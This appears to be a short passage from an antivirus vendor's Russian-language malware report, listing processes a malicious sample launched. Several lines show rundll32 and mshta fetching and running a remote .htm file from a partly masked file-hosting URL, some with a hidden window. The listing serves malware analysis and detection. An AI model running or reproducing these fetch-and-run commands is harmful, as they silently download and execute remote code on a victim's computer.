Техническая информация
- '<SYSTEM32>\rundll32.exe' SHELL32.DLL,ShellExec_RunDLL "mshta" "https://www.me###fire.com/file/l5t747mtxmzo0s7/9.htm/file
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\1162363.cvr
- '<SYSTEM32>\rundll32.exe' SHELL32.DLL,ShellExec_RunDLL "mshta" "https://www.me###fire.com/file/l5t747mtxmzo0s7/9.htm/file' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' "https://www.me###fire.com/file/l5t747mtxmzo0s7/9.htm/file' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' "https://www.me###fire.com/file/l5t747mtxmzo0s7/9.htm/file